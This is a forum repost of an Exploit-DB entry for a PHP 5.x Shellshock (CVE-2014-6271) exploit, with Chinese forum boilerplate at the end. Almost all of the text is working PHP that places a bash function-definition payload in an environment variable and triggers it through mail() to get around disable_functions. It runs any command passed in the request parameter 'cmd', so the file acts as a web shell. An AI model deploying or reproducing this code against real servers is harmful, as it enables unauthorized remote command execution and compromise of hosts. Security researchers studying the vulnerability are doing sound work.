|
|
- # Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions)
- # Google Dork: none
- # Date: 10/31/2014
- # Exploit Author: Ryan King (Starfall)
- # Vendor Homepage: http://php.net
- # Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror
- # Version: 5.* (tested on 5.6.2)
- # Tested on: Debian 7 and CentOS 5 and 6
- # CVE: CVE-2014-6271
-
- <?php
- function shellshock($cmd) { // Execute a command via CVE-2014-6271 @
- mail.c:283
- if(strstr(readlink("/bin/sh"), "bash") != FALSE) {
- $tmp = tempnam(".","data");
- putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");
- // In Safe Mode, the user may only alter environment variables
- whose names
- // begin with the prefixes supplied by this directive.
- // By default, users will only be able to set environment variables
- that
- // begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive is
- empty,
- // PHP will let the user modify ANY environment variable!
- mail("a@127.0.0.1","","","","-bv"); // -bv so we don't actually
- send any mail
- }
- else return "Not vuln (not bash)";
- $output = @file_get_contents($tmp);
- @unlink($tmp);
- if($output != "") return $output;
- else return "No output, or not vuln.";
- }
- shellshock($_REQUEST["cmd"]);
- ?>
from:http://www.exploit-db.com/exploits/35146/ |
|
|小黑屋|手机版|中国白客联盟-BUC
( 赣ICP备15007148号-6 ) 
窥视卡
雷达卡
发表于 2014-11-18 19:20:48
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡